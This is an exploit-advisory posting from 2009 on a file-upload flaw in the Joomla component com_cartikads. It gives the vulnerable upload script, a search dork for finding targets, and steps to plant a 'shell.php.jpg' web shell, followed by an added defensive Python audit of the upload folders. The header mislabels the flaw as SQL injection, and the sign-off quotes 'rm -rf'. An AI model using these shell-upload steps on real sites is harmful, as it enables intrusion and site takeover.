###################################################################################
#
[~] Joomla components com_cartikads Remote File Upload vulnerability #
[~] Author : kaMtiEz (kamzcrew@yahoo.com) #
[~] Homepage : http://www.indonesiancoder.com #
[~] Date : January 02, 2009 #
#
###################################################################################

[ Software Information ]

[+] Vendor : http://www.cartikahosting.com
[+] Download : -
[+] version : 1.0
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : dunno
[+] Location : INDONESIA - JOGJA
[+] description : Cartikads is a Mambo Open Source ads management component.

##################################################################################

[ HERE WE GO .. LIVE FROM JOGJA CITY ]

[ Vulnerable File ]

http://server/[kaMtiEz]/components/com_cartikads/uploadimage.php

[ NOTE ]

upload with extension shell.php.jpg

your shell will be

http://server/[kaMtiEz]/images/stories/shell.php.jpg

http://server/[kaMtiEz]/images/banners/shell.php.jpg

===========================================================================
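
An added example, not part of the original advisory: a defender-side Python audit of the two upload directories named above. It flags files whose name carries a script extension in any dot-separated segment (the shell.php.jpg pattern) or whose content holds a PHP open tag. The extension list, function names and sample files are assumptions constructed for illustration.

```python
import tempfile
from pathlib import Path

# Assumed list of extensions a web server may hand to an interpreter.
SCRIPT_EXTS = {"php", "php3", "php4", "php5", "phtml", "phar", "cgi", "pl", "asp", "jsp"}
# Upload directories named in the advisory, relative to the Joomla root.
UPLOAD_DIRS = ("images/stories", "images/banners")

def risky_segments(filename):
    """Script extensions in any dot-separated segment, not only the last."""
    return [p for p in filename.lower().split(".")[1:] if p in SCRIPT_EXTS]

def contains_php(path, limit=65536):
    """True if the first `limit` bytes hold a PHP open tag."""
    with open(path, "rb") as fh:
        head = fh.read(limit).lower()
    return b"<?php" in head or b"<?=" in head

def audit(joomla_root):
    """Return {relative_path: [reasons]} for suspicious uploaded files."""
    root, findings = Path(joomla_root), {}
    for rel in UPLOAD_DIRS:
        for full in sorted((root / rel).rglob("*")):
            if not full.is_file():
                continue
            checks = (("script extension in name", risky_segments(full.name)),
                      ("PHP open tag in content", contains_php(full)))
            reasons = [label for label, hit in checks if hit]
            if reasons:
                findings[full.relative_to(root).as_posix()] = reasons
    return findings

def demo():
    """Audit a constructed upload tree (sample files, not real data)."""
    root = Path(tempfile.mkdtemp())
    samples = {
        "images/stories/shell.php.jpg": b"<?php /* constructed */ ?>",
        "images/banners/logo.jpg": b"\xff\xd8\xff\xe0 constructed bytes",
        "images/banners/photo.jpg": b"\xff\xd8\xff\xe0 <?php echo 1; ?>",
    }
    for rel, data in samples.items():
        (root / rel).parent.mkdir(parents=True, exist_ok=True)
        (root / rel).write_bytes(data)
    return audit(root)

if __name__ == "__main__":
    for path, reasons in demo().items():
        print(path, "->", "; ".join(reasons))
```

On a real host, call audit() with the Joomla document root; a hit in either directory warrants checking web server logs for requests to that path.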

[ Thx TO ]
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry ..
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk

[ NOTE ]

[+] My mom and dad .. and not forgetting my little sibling ..
[+] tukulesto : where did u go ??
[+] Listen to the radio at http://antisecradio.fm :D

[ QUOTE ]

[+] rm -rf

[ EOF ]

[+] INDONESIANOCODER TEAM
[+] KILL -9 TEAM